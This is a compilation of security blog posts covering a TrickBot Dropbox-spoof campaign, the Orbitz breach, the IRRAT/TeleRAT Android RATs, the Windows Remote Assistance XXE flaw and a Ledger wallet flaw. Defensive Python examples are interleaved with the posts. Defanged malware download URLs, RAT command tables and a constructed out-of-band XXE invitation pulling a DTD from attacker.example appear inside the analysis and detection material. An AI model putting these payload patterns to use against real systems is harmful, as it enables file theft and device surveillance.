Security Alert: New Spam Campaign Delivers Trickbot Payload, Spoofs Dropbox

You may remember TrickBot, the financial Trojan that appeared in the past targeting many US banks and payment companies, PayPal among them. TrickBot’s authors are persistent and continue to find new ways to harvest users’ valuable data. Recently, researchers discovered a spam email campaign in which the malicious actors have resorted to spoofing Dropbox.

Security researchers analyzed a new spam email campaign delivering the TrickBot malware; the email claims to come from the legitimate Dropbox website but actually links to a look-alike site.

The unwanted email is delivered with the following details (sanitized for your own protection):

From: Dropbox 

Subject line:

A new document is available for download



Your company administrator has uploaded a secure document for you or your company.

Your ID: [email address]

Your unique download key: 6M4V74YEVMDHGR

This string of letters and numbers is a unique ID for the document you received.

To view or print the document please click here [link to dropboxsec[.]com]

The document associated with this unique ID opens. You can now sign, download and save, print, and perform “More” actions on the document, depending on the permissions the sender has given you.

Please contact your administrator for more information.


– The Dropbox Team
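The lure above claims to be Dropbox while every link points at a look-alike domain. The following is an added example (not tooling from Heimdal or CSIS) of the check a mail-gateway triage script would run: parse the raw message, compare the brand named in the From display name against the sender’s domain and the host of every link in the body, and defang the hosts for reporting. Both sample messages are constructed from the lure text; the sender addresses and the per-brand domain allow-list are assumptions.

```python
"""Brand-spoof check for a lure like the 'Dropbox' message above.
Added example, not tooling from Heimdal or CSIS. It parses a raw message,
compares the display name the sender claims against the domains of the sender
address and of every link in the body, and defangs the hosts for reporting.
The sample messages are constructed from the lure text in the alert; the
sender addresses and the per-brand domain allow-list are assumptions."""
import email
import re
from email import policy
from urllib.parse import urlsplit

# Assumed allow-list: hosts a genuine Dropbox notification would use.
BRAND_DOMAINS = {
    "dropbox": {"dropbox.com", "dropboxusercontent.com"},
}
URL_RE = re.compile(r"""https?://[^\s<>"'\]]+""", re.IGNORECASE)

SPOOFED_EMAIL = """\
From: Dropbox <no-reply@dropboxsec.net>
To: victim@example.com
Subject: A new document is available for download
Content-Type: text/plain; charset="utf-8"

Your company administrator has uploaded a secure document for you or your company.
Your unique download key: 6M4V74YEVMDHGR
To view or print the document please click here hxxps://dropboxsec[.]net/6M4V74YEVMDHGR.doc
- The Dropbox Team
"""

GENUINE_EMAIL = """\
From: Dropbox <no-reply@dropbox.com>
To: victim@example.com
Subject: A new document is available for download
Content-Type: text/plain; charset="utf-8"

A file was shared with you: https://www.dropbox.com/s/abc123/agenda.pdf
"""


def refang(text):
    """Undo the usual hxxp / [.] sanitization so URLs parse."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def defang(host):
    return host.replace(".", "[.]")


def host_under(host, domain):
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def triage(raw_message):
    """Return the sender/link verdict for one message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    sender = msg["From"].addresses[0]
    allowed = BRAND_DOMAINS.get(sender.display_name.strip().lower(), set())
    sender_ok = any(host_under(sender.domain, d) for d in allowed)

    body = msg.get_body(preferencelist=("plain", "html")).get_content()
    links = []
    for url in URL_RE.findall(refang(body)):
        host = urlsplit(url).hostname or ""
        links.append({
            "url": url,
            "host": defang(host),
            "brand_match": any(host_under(host, d) for d in allowed),
        })
    return {
        "display_name": sender.display_name,
        "sender_domain": defang(sender.domain),
        "sender_matches_brand": sender_ok,
        "links": links,
        # A brand we know, claimed by a sender or link outside its domains.
        "suspicious": bool(allowed) and (not sender_ok or any(not l["brand_match"] for l in links)),
    }


if __name__ == "__main__":
    for raw in (SPOOFED_EMAIL, GENUINE_EMAIL):
        print(triage(raw))
```

The verdict is only raised for brands that have an allow-list entry; a display name the script has no baseline for is left alone rather than guessed at, so the list is the part to extend for your own environment.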

How the infection happens

If a user is lured into clicking the malicious link, a specially crafted document is delivered from a URL that looks like this one:

https://dropboxsec[.]net/6M4V74YEVMDHGR.doc

If the recipient enables the macro code in the malicious Word document, TrickBot is retrieved from the following URLs (sanitized for your own safety):

http://techknowlogix[.]net/farestod.png
http://[.]ve/farestod.png

This TrickBot variant carries the group tag (gtag) “tt0002” and version number 1000147. It comes with several modules, including configuration files in encrypted form.

For persistence, it uses the Task Scheduler COM interface to create a scheduled task that re-executes the TrickBot payload after a reboot from a folder under the user’s AppData\Roaming directory named after the client ID.

TrickBot calls the GetNativeSystemInfo API and checks the wProcessorArchitecture field of the SYSTEM_INFO structure it returns to determine whether it is running on a 32-bit or 64-bit CPU.

Here is how the configuration file listing the C&C servers mentioned above is laid out. These servers are used by the malicious actors to maintain communication with compromised systems:

<mcconf>
<ver>1000000</ver>
<gtag>tt0002</gtag>
<servs>
[C&C]:[port]
</servs>
<autorun>
</autorun>
</mcconf>
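Once the config has been decrypted, pulling the version, group tag, C&C list and autorun modules out of it is a small parsing job. The following is an added example, not code from the alert or from CSIS: the sample config is constructed with RFC 5737 documentation addresses in place of real C&C IPs, the server entries are assumed to be <srv> elements, and decrypting the config out of the bot’s resources is outside this snippet.

```python
"""Extract the fields the alert discusses from a decrypted TrickBot 'mcconf'
configuration: version, group tag, C&C servers and autorun modules.
Added example, not code from the alert or from CSIS. The config below is
constructed with RFC 5737 documentation addresses in place of real C&C IPs
and assumes server entries are <srv> elements; decrypting the config out of
the bot's resources is outside this snippet."""
import xml.etree.ElementTree as ET

SAMPLE_MCCONF = """<mcconf>
<ver>1000147</ver>
<gtag>tt0002</gtag>
<servs>
<srv>192.0.2.10:443</srv>
<srv>198.51.100.23:449</srv>
<srv>203.0.113.7</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>"""


def parse_mcconf(text):
    """Return {'ver', 'gtag', 'servers': [(host, port|None)], 'modules': [(name, ctl|None)]}."""
    root = ET.fromstring(text)
    if root.tag != "mcconf":
        raise ValueError(f"not a TrickBot mcconf document: <{root.tag}>")
    servers = []
    for srv in root.iterfind("servs/srv"):
        host, _, port = (srv.text or "").strip().rpartition(":")
        if not host:                     # no ':' -> the whole string is the host
            host, port = port, ""
        servers.append((host, int(port) if port.isdigit() else None))
    modules = [(m.get("name"), m.get("ctl")) for m in root.iterfind("autorun/module")]
    return {"ver": root.findtext("ver"), "gtag": root.findtext("gtag"),
            "servers": servers, "modules": modules}


def defanged_iocs(config):
    """C&C entries in the defanged form used for sharing, e.g. 192[.]0[.]2[.]10:443."""
    out = []
    for host, port in config["servers"]:
        host = host.replace(".", "[.]")
        out.append(f"{host}:{port}" if port is not None else host)
    return out


if __name__ == "__main__":
    cfg = parse_mcconf(SAMPLE_MCCONF)
    print(f"gtag={cfg['gtag']} ver={cfg['ver']}")
    print("\n".join(defanged_iocs(cfg)))
```

The gtag is the field worth keying on when grouping samples: it identifies the distribution campaign, while the version number only tells you how recent the bot build is.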

Heimdal Security proactively blocked these infected domains (and malicious emails), so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 17 of 56 antivirus products detected the malicious sample from this campaign at the time of writing this security alert.

VirusTotal analysis

How to stay safe from banking trojans

Trickbot is known for its banking trojan features and the various ways used by cyber criminals to steal users’ personal information and harvest their sensitive data.

We recommend you:

  • Keep your operating system and all your applications up to date; unpatched software is the first place malicious actors look for flaws to exploit.
  • Do not open unexpected emails or click suspicious links and attachments.
  • Keep a backup of all your important data on external storage (an external hard drive) or in the cloud (Google Drive, Dropbox, etc.). This guide shows you how to do it.
  • Set strong, unique passwords; this security guide comes in handy.
  • Run software from a non-administrative user account and disable macros in Microsoft Office.
  • Make sure you have a reliable antivirus program installed on your PC to protect your valuable data from online threats.

*This article features cyber intelligence provided by CSIS Security Group researchers.

The post Security Alert: New Spam Campaign Delivers Trickbot Payload, Spoofs Dropbox appeared first on Heimdal Security Blog.

Author: Ioana Rijnetu

Expedia’s Orbitz Says 880,000 Payment Cards Compromised in Security Breach

Chicago-based online travel booking company Orbitz, a subsidiary of Expedia, reveals that one of its old websites has been hacked, exposing nearly 880,000 payment card numbers of the people who made purchases online.

The data breach incident, which was detected earlier this month, likely took place somewhere between October 2016 and December 2017, potentially exposing customers’ information to hackers.

According to the company, hackers may have accessed payment card information stored on a consumer and business partner platform, along with customers’ personal information, including name, address, date of birth, phone number, email address and gender.

Orbitz worked closely with cybersecurity experts and law enforcement to investigate the breach and confirms that U.S. customers’ Social Security numbers were not exposed in this incident.

The company says it has enhanced the security of the compromised platform and assures customers that the current website was not impacted.

“We deeply regret the incident, and we are committed to doing everything we can to maintain the trust of our customers and partners,” Orbitz said in a statement.

Orbitz is currently working to notify the thousands of affected customers and plans to offer one year of free credit monitoring and identity protection service.

Since the payment card information is now in the hands of cybercriminals, customers are advised to closely monitor their credit card statements and report any unauthorised charges to the issuing bank.


TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users


Telegram Bots are special accounts that do not require an additional phone number to set up and are generally used to enrich Telegram chats with content from external services or to get customized notifications and news. And while Android malware abusing Telegram’s Bot API to target Iranian users is not fresh news (the emergence of a Trojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these Telegram Bots were being abused to command and control malicious Android applications.

This blog details our findings, including some Operational Security (OPSEC) fails we navigated while sifting through multiple malicious APK variants abusing Telegram’s Bot API, and the discovery of a new Trojan we’ve named “TeleRAT”. Unlike IRRAT, TeleRAT abuses Telegram’s Bot API not only for Command and Control (C2) but also for data exfiltration.

What We Already Know: IRRAT

Based on previous reports, we know Telegram’s Bot API was already being employed by attackers to steal information ranging from SMS and call history to file listings from infected Android devices. The majority of the apps we saw disguise themselves as an app that tells you how many views your Telegram profile received – needless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such information.

We continue to see IRRAT active in the wild to date.

We used the below sample for this analysis.

SHA256 1d0770ac48f8661a5d1595538c60710f886c254205b8cf517e118c94b256137d

IRRAT works by creating and then populating the following files on the phone’s SD card and sending them to the upload server after the app’s first launch:

  • “[IMEI] numbers.txt”: Contact information
  • “[IMEI]acc.txt”: List of Google accounts registered on the phone
  • “[IMEI]sms.txt”: SMS history
  • 1.jpg: Picture taken with the front-facing camera
  • Image.jpg: Picture taken with back-facing camera

Finally, it reports back to a Telegram bot (identified by a bot token hardcoded in each RAT’s source code) with the beacon below (newlines are shown as \n; the Persian strings read “New installation” and “Device IMEI”), after which the application icon is hidden from the phone’s app menu:

hxxp://[APIKey]/sendmessage?chat_id=[ChatID]?text=نصب جدید\n[IMEI]\nIMEI : :[IMEI]\nAndroid ID : [AndroidID]\nModel : [PhoneModel]\n[IP]\n\nIMEI دستگاه: [IMEI]

In the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain commands, as detailed below.

Command | Action | Communication to Telegram bot
call@[IMEI]@[Number] | Places a call to [Number] | hxxps://[APIKey]/sendmessage?chat_id=[ChatID]&text=call with [Number]
sms@[IMEI]@[Number]@[Text] | Sends SMS [Text] to [Number] | hxxps://[APIKey]/sendmessage?chat_id=[ChatID]&text=sent
getapps@[IMEI] | Saves a list of installed apps to the SD card as “[IMEI] apps.txt”, uploads it to the upload server | None
getfiles@[IMEI]@[DirPath] | Retrieves a file listing of [DirPath], saves it to the SD card as “[IMEI]files.txt”, uploads it to the server | None
getloc@[IMEI] | Starts a GPS listener that monitors location changes | None
upload@[IMEI]@[FilePath] | Uploads the file at [FilePath] | None
removeA@[IMEI]@[FilePath on SDCard] | Deletes the file at [FilePath on SDCard] | hxxps://[APIKey]/sendmessage?chat_id=[ChatID]&text= ______________[FilePath on SDCard]
removeB@[IMEI]@[DirPath on SDCard] | Deletes [DirPath on SDCard] | None
lstmsg@[IMEI] | Saves SMS history to the SD card as “[IMEI]lstmsg.txt”, uploads it to the server | None
yehoo@[IMEI] | Takes a picture with the front camera, saves it to the SD card as “yahoo.jpg”, uploads it to the server | None

Table 1: List of IRRAT bot commands

As the table above shows, this IRRAT sample makes use of Telegram’s bot API solely to communicate commands to infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting service. Fortunately for us, these servers had several OPSEC fails. More on that further below.

A New Family: TeleRAT

While sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs seemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for C2 but also for exfiltrating stolen information.


Figure 1: Pivoting in AutoFocus for applications using the Telegram bot API

We named this new family “TeleRAT” after one of the files it creates on infected devices.

We used the below sample for this analysis.

SHA256 01fef43c059d6b37be7faf47a08eccbf76cf7f050a7340ac2cae11942f27eb1d

Post-installation TeleRAT creates two files in the app’s internal directory:

  • telerat2.txt containing a slew of information about the device – including the System Bootloader version number, total and available Internal and External memory size, and number of cores.
  • thisapk_slm.txt, mentioning a Telegram channel and a list of commands. We investigate this Telegram channel in greater detail further below.

The RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the Telegram Bot API with the current date and time.

More interestingly, it starts a service that listens for changes made to the Clipboard in the background.


Figure 2: Code snippet that listens for clipboard changes

Finally, the app fetches updates from the Telegram bot API every 4.6 seconds, listening for the following commands (we used Google Translate for the Farsi (Persian) translations below):


Command | Translation / action
دریافت مخاطبین | Get contacts
دریافت کلیپ بورد | Get the clipboard
Clipboard set:[text] | (command given in English)
دریافت مکان | Get location
دریافت اطلاعات شارژ | Get charging information
All file list:/[path] | (command given in English)
Root file list:/[path] | (command given in English)
دریافت برنامه ها | Get apps
SetWallpaper http[URL] | (command given in English)
دریافت پیام ها | Get (SMS) messages
گرفتن عکس1 | Take photo 1 (front camera)
گرفتن عکس2 | Take photo 2 (back camera)
دریافت وضعیت | Get status
دریافت تماس ها | Get calls
سایلنت | Silent (set to vibrate mode)
صدادار | Loud (set to normal ringer mode)
بیصدا | Mute (set to silent mode)
Blacksc | Blacks out the phone screen
Blackscf | Clears the black screen
ضبط فیلم | Start audio recording (saves the recording to AUDIO123/MUSIC/rec123.m4a on the SD card)
توقف ضبط فیلم | Stop audio recording
راهنمای دستورات | Command help (help menu)
call to [number] | (command given in English)
RESET | Deletes thisapk_slm.txt and sends a new registration message to the Telegram bot
دریافت گالری | Get gallery (sends files from the /Dcim folder on the SD card to the Telegram bot)
Delete app files or دریافت گالری | (command given in English)
Vibrate [x] | Vibrates the phone for x seconds (maximum 600 secs)
لرزش کم | Low vibration (150 secs)
لرزش متوسط | Medium vibration (350 secs)
لرزش زیاد | High vibration (600 secs)

Table 2: List of TeleRAT bot commands

Aside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated data using Telegram’s sendDocument API method.


Figure 3: Code snippet showing the use of the SendDocument Telegram bot API method

TeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on traffic to known upload servers, as all communication (including uploads) is done via the Telegram bot API. However, it still leaves other doors open via Telegram’s bot API, since the API Keys are hardcoded in the APKs.

The API allows fetching updates by two means:

1. The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including usernames from which the commands originated. From the bots that were still responding and had an update history (incoming updates are only kept for 24 hours as per Telegram’s policy), we were able to find bot commands originating from four Telegram accounts, shown below.


Figure 4: Telegram usernames revealed from bot command histories

2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook. Their policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used certificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world of third party webhosting and open directories. Let’s Encrypt has been notified about this activity.

A sample of only a few Webhooks we found are shown below. hxxps://mr-mehran[.]tk/pot/Bot/ in particular appears to be hosting close to 6500 bots, however, we can’t confirm whether they’re all used for malicious purposes.


Figure 5: Webhooks found associated with some TeleRAT bots
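The two weaknesses just described (a bot token hard-coded in the APK, and a getUpdates history that names whoever has been commanding the bot) are what an analyst pivots on. The following is an added example, not Unit 42’s tooling: it pulls tokens out of strings dumped from an APK, builds the Bot API URLs to query, and walks a getUpdates response to list the operators and decode IRRAT’s verb@IMEI@arg commands from Table 1. Every token, username, IMEI and message in it is constructed; the response shape follows Telegram’s published Update and Message objects.

```python
"""Triage helpers for Android RATs commanded through Telegram's Bot API.
Added example for the IRRAT/TeleRAT analysis above; not Unit 42's tooling.
Covers the three things the post describes: a bot token hard-coded in the APK,
the getUpdates history that exposes the operators' usernames, and the
verb@IMEI@arg command grammar from Table 1. Every token, username, IMEI and
message below is constructed for the demo."""
import json
import re

# Bot API token: numeric bot id, colon, 35-char secret (Telegram's format).
TOKEN_RE = re.compile(r"(\d{6,12}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
BOT_API = "https://api.telegram.org/bot{token}/{method}"

# Verbs from Table 1 (IRRAT): verb@IMEI[@arg[@arg]]
IRRAT_VERBS = {"call", "sms", "getapps", "getfiles", "getloc",
               "upload", "removeA", "removeB", "lstmsg", "yehoo"}

# Constructed: a few lines as they might appear in `strings classes.dex`.
SAMPLE_STRINGS = """Lcom/example/profilechecker/MainActivity;
https://api.telegram.org/bot123456789:AAExampleTokenFromApkStrings0000001/sendMessage?chat_id=
987654321
555555555:AAF-second_token_in_strings_abcdefg
telerat2.txt
thisapk_slm.txt
"""

# Constructed getUpdates reply; field names follow Telegram's Update/Message objects.
SAMPLE_UPDATES = json.dumps({"ok": True, "result": [
    {"update_id": 700001, "message": {"message_id": 5,
     "from": {"id": 1001, "is_bot": False, "first_name": "A", "username": "op_one"},
     "chat": {"id": 1001, "type": "private"}, "date": 1521000000,
     "text": "call@356938035643809@+989120000000"}},
    {"update_id": 700002, "message": {"message_id": 6,
     "from": {"id": 1002, "is_bot": False, "first_name": "B", "username": "op_two"},
     "chat": {"id": 1002, "type": "private"}, "date": 1521000100,
     "text": "دریافت مخاطبین"}},
]})


def extract_bot_tokens(strings_blob):
    """Unique bot tokens found in dumped strings, standalone or inside a URL."""
    tokens = []
    for bot_id, secret in TOKEN_RE.findall(strings_blob):
        token = f"{bot_id}:{secret}"
        if token not in tokens:
            tokens.append(token)
    return tokens


def api_url(token, method):
    """Bot API endpoint; getUpdates and getWebhookInfo are the two the post
    uses to recover command history and webhook targets from a stolen token."""
    return BOT_API.format(token=token, method=method)


def parse_irrat_command(text):
    """Decode IRRAT's verb@IMEI@args grammar; None for anything else
    (TeleRAT's Persian commands, operator chatter)."""
    parts = text.split("@")
    if len(parts) < 2 or parts[0] not in IRRAT_VERBS:
        return None
    return {"verb": parts[0], "imei": parts[1], "args": parts[2:]}


def commanders_from_updates(updates_json):
    """(username, text, parsed_command) for every message in a getUpdates
    response. Telegram only retains these updates for 24 hours, so pull them
    early; a bot that has a webhook set returns none (check getWebhookInfo)."""
    rows = []
    for upd in json.loads(updates_json).get("result", []):
        msg = upd.get("message") or {}
        text = msg.get("text")
        if text is None:
            continue
        sender = msg.get("from") or {}
        who = sender.get("username") or f"id:{sender.get('id')}"
        rows.append((who, text, parse_irrat_command(text)))
    return rows


if __name__ == "__main__":
    for tok in extract_bot_tokens(SAMPLE_STRINGS):
        print("token:", tok, "->", api_url(tok, "getUpdates"))
    for who, text, cmd in commanders_from_updates(SAMPLE_UPDATES):
        print(f"{who}: {text!r} -> {cmd}")
```

Only getUpdates and getWebhookInfo are read-only; calling getUpdates with an offset acknowledges updates and removes them from the queue for the operator too, so fetch without an offset and never send messages through a recovered token.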

OPSEC Fails, Distribution Channels & Attribution

In our research we were able to find what was clearly an image of the botmaster testing out the RAT, based on the Telegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.


Figure 6: Image of botmaster testing out the RAT

We were also able to find exfiltrated messages that confirmed our theory about the test run and reveal a thread in Persian (Farsi) seemingly discussing bot setup.

“صبح ساعت ۶ انلاین شو تا روباته رو امتحان کنیم”

Translation: “Be online at 6 in the morning so we can test the bot.”

While investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in the code. One username is seen in the screenshot below.


Figure 7: Telegram channel advertised in source code

Looking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders that ran the entire gamut – from applications that get you likes and followers on Instagram, to ransomware, and even the source code for an unnamed RAT (complete with a video tutorial, shown below).


Figure 8: Screenshot from a Telegram channel advertising & sharing a RAT source code

Aside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon some threads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum is frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we came across.


Figure 9: Advertisement for sale of a Telegram bot control library

The forum goes the extra mile to mention that all content is in accordance with Iran’s laws. However, it’s hard to see any non-malicious use for some of the code advertised there or written by developers that frequent it – for instance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet in Figure 2 above).


Figure 10: Forum Disclaimer

Overall, TeleRAT pieces together code written by several developers. Because source code is freely available via Telegram channels and sold on forums, we cannot point to a single actor commanding either IRRAT or TeleRAT; it appears to be the work of several actors, possibly operating inside Iran.


As we investigated these RATs, we also started looking at how victims were getting infected. We witnessed several third-party Android application stores distributing seemingly legitimate applications like “Telegram Finder”, which supposedly helps users locate and communicate with other users with specific interests, like knitting. We also witnessed several samples distributed and shared via both legitimate and nefarious Iranian Telegram channels.


Figure 11: Iranian third-party application store

Looking closer at the malicious APKs we were able to get an understanding of common application naming conventions and functionality across the board.


Figure 12: ‘Telegram finder’ application

Based on the samples we analysed, the three most common application names for both IRRAT and TeleRAT are:

Native App Name | Translated App Name
پروفایل چکر | Profile Checker
بازدید یاب تلگرام | Telegram Finder
telegram hacker | N/A

Additionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such as “atom vpn” and “vpn for telegram.

Based on the infrastructure we analysed, 2,293 victims had been identified at the time of writing. The geographic spread is small: 82% of the victims have Iranian phone numbers.

Country | Victims
Iran | 1894
India | 227
Afghanistan | 109
United Kingdom | 53
Pakistan | 10

There may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the number of victims likely residing within Iran far exceeds the victim count for any other country.


Part of dissecting and understanding new threats involves looking closer at already established campaigns and malware variants. This is a perfect example of just that: looking closer at a previously established malware family to better understand its current and possibly changed capabilities.

While malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family, TeleRAT, hiding entirely behind Telegram’s API to evade network-based detection and exfiltrate data. Leveraging intelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to paint an accurate picture of an ongoing operation leveraging Telegram’s API and targeting users via third party application sites and social media channels.

Taking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such as:

  • Avoid third-party application stores or sources.
  • Don’t allow application sideloading on your device.
  • Ensure the application you are installing is official, regardless of source.
  • Closely review and scrutinize application permission requests prior to installation.

Palo Alto Networks customers are protected from this threat by:

  1. WildFire detects all TeleRAT and IRRAT files with malicious verdicts.
  2. AutoFocus customers can track these samples with the IRRAT and TeleRAT
  3. Traps blocks all of the APK files associated with TeleRAT and IRRAT.


Telegram usernames found commanding IRRAT or TeleRAT



hxxps://ربات ساز/CreateBotAll.php

The post TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users appeared first on Palo Alto Networks Blog.

Author: Ruchna Nigam

Windows Remote Assistance Exploit Lets Hackers Steal Sensitive Files

You have always been warned not to share remote access to your computer with untrusted people for any reason—it’s a basic cybersecurity advice, and common sense, right?

But what if I told you that you should not even trust anyone who invites or offers you full remote access to their computer?

A critical vulnerability has been discovered in Microsoft’s Windows Remote Assistance feature that affects all supported versions of Windows, including Windows 10, 8.1, RT 8.1, and 7, and allows remote attackers to steal sensitive files from the targeted machine.

Windows Remote Assistance is a built-in tool that allows someone you trust to take over your PC (or you to take remote control of others) so they can help you fix a problem from anywhere around the world.

The feature relies on the Remote Desktop Protocol (RDP) to establish a secure connection with the person in need.

However, Nabeel Ahmed of Trend Micro Zero Day Initiative discovered and reported an information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance that could allow attackers to obtain information to further compromise the victim’s system.

The vulnerability, which Microsoft fixed in this month’s Patch Tuesday release, resides in the way Windows Remote Assistance processes XML External Entities (XXE).

The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit).

Exploiting Windows Remote Assistance to Steal Files


Since a security patch for this vulnerability is now available, the researcher has finally released technical details and proof-of-concept exploit code for the flaw to the public.

The flaw resides in the MSXML3 parser. To exploit it, the attacker uses the “Out-of-Band Data Retrieval” XXE technique, and the social-engineering twist is that the attacker offers the victim access to the attacker’s own computer via Windows Remote Assistance, rather than asking for access to the victim’s.

While setting up Windows Remote Assistance, the feature gives you two options—Invite someone to help you and Respond to someone who needs help.

Selecting the first option helps users generate an invitation file, i.e. ‘invitation.msrcincident,’ which contains XML data with a lot of parameters and values required for authentication.


Since the parser does not properly validate the content, the attacker can send the victim a specially crafted Remote Assistance invitation file containing a malicious payload; when the victim opens it, the external entities it declares make the victim’s computer submit the contents of specific files at known locations to a remote server controlled by the attacker.

“The stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. In all cases, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action,” Microsoft explains.

“This XXE vulnerability can be genuinely used in mass scale phishing attacks targeting individuals believing they are truly helping another individual with an IT problem. Totally unaware that the .msrcincident invitation file could potentially result in loss of sensitive information,” Ahmed warns.
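A genuine invitation is a flat XML document with no DOCTYPE, whereas the out-of-band technique described above needs a DOCTYPE whose entities point at an external resource (typically a parameter entity that pulls a DTD from the attacker’s server). The following is an added example, not the researcher’s proof of concept: a gateway-side check that flags exactly those DTD constructs so a .msrcincident attachment can be held before it ever reaches the MSXML3 parser. Both sample files are constructed, and the benign one only approximates the real UPLOADINFO/UPLOADDATA layout.

```python
"""Gateway check for Remote Assistance invitation files (.msrcincident).
A genuine invitation is a flat XML document with no DOCTYPE, while the
out-of-band XXE technique described above needs a DOCTYPE with an entity that
points at an external resource (typically a parameter entity pulling a DTD from
the attacker's server). This flags exactly that, so the file can be held before
it reaches the MSXML3 parser in msra.exe. Added example, not the researcher's
proof of concept; both sample files are constructed, and the benign one only
approximates the real UPLOADINFO/UPLOADDATA layout."""
import xml.parsers.expat

BENIGN_INVITATION = b"""<?xml version="1.0" encoding="UTF-8"?>
<UPLOADINFO TYPE="Escalated">
<UPLOADDATA USERNAME="helper" RCTICKET="65538,1,203.0.113.5:3389;" PassStub="abc" />
</UPLOADINFO>"""

# Constructed OOB XXE shape: the parameter entity fetches an attacker DTD that
# would in turn define entities reading local files and sending them out.
OOB_XXE_INVITATION = b"""<?xml version="1.0"?>
<!DOCTYPE UPLOADINFO [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<UPLOADINFO TYPE="Escalated"><UPLOADDATA USERNAME="helper"/></UPLOADINFO>"""


def dtd_findings(xml_bytes):
    """Describe every DOCTYPE and entity declaration expat sees. Expat is used
    only as a tokenizer here: it is created with its defaults, which never
    fetch external entities, so the check itself cannot be turned into XXE."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE {name} external_id={sysid or pubid or None}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "%" if is_param else "&"
        if sysid or pubid:
            findings.append(f"external entity {kind}{name}; SYSTEM {sysid or pubid}")
        else:
            findings.append(f"internal entity {kind}{name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as err:
        # Declarations seen before the error still count; a bare parse
        # failure is recorded so the caller can decide to fail closed.
        findings.append(f"malformed: {err}")
    return findings


def is_suspicious_invitation(xml_bytes):
    """True when any DTD construct is present; genuine invitations have none."""
    return any(not f.startswith("malformed") for f in dtd_findings(xml_bytes))


if __name__ == "__main__":
    for label, data in (("benign", BENIGN_INVITATION), ("xxe", OOB_XXE_INVITATION)):
        print(label, is_suspicious_invitation(data), dtd_findings(data))
```

The same rule applies to any consumer of this file: a parser that simply refuses DOCTYPE declarations (rather than trying to sanitize them) is the hardened configuration, and that is what the check enforces at the perimeter.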

Along with the other critical vulnerabilities fixed this month, Windows users are strongly recommended to install the latest update for Windows Remote Assistance as soon as possible.


15-Year-old Finds Flaw in Ledger Crypto Wallet

A 15-year-old security researcher has discovered a serious flaw in cryptocurrency hardware wallets made by Ledger, a French company whose popular products are designed to physically safeguard public and private keys used to receive or spend the user’s cryptocurrencies.

Ledger’s Nano-S cryptocurrency hardware wallet. Source: Amazon.

Hardware wallets like those sold by Ledger are designed to protect the user’s private keys from malicious software that might try to harvest those credentials from the user’s computer.  The devices enable transactions via a connection to a USB port on the user’s computer, but they don’t reveal the private key to the PC.

Yet Saleem Rashid, a 15-year-old security researcher from the United Kingdom, discovered a way to acquire the private keys from Ledger devices. Rashid’s method requires an attacker to have physical access to the device, and normally such hacks would be unremarkable because they fall under the #1 rule of security — namely, if an attacker has physical access to your device, then it is not your device anymore.

The trouble is that consumer demand for Ledger’s products has frequently outpaced the company’s ability to produce them (it has sold over a million of its most popular Nano S models to date). This has prompted the company’s chief technology officer to state publicly that Ledger’s built-in security model is so robust that it is safe to purchase their products from a wide range of third-party sellers, including Amazon and eBay.

Ledger’s message to users regarding the lack of anti-tampering mechanisms on its cryptocurrency hardware wallets.

But Rashid discovered that a reseller of Ledger’s products could update the devices with malicious code that would lie in wait for a potential buyer to use it, and then siphon the private key and drain the user’s cryptocurrency account(s) when the user goes to use it.

The crux of the problem is that Ledger’s devices contain a secure processor chip and a non-secure microcontroller chip. The latter is used for a variety of non-security related purposes, from handling the USB connections to displaying text on the Ledger’s digital display, but the two chips still pass information between each other. Rashid found that an attacker could compromise the insecure processor (the microcontroller) on Ledger devices to run malicious code without being detected.

Ledger’s products do contain a mechanism for checking to ensure the code powering the devices has not been modified, but Rashid’s proof-of-concept code — being released today in tandem with an announcement from Ledger about a new firmware update designed to fix the bug — allows an attacker to force the device to sidestep those security checks.

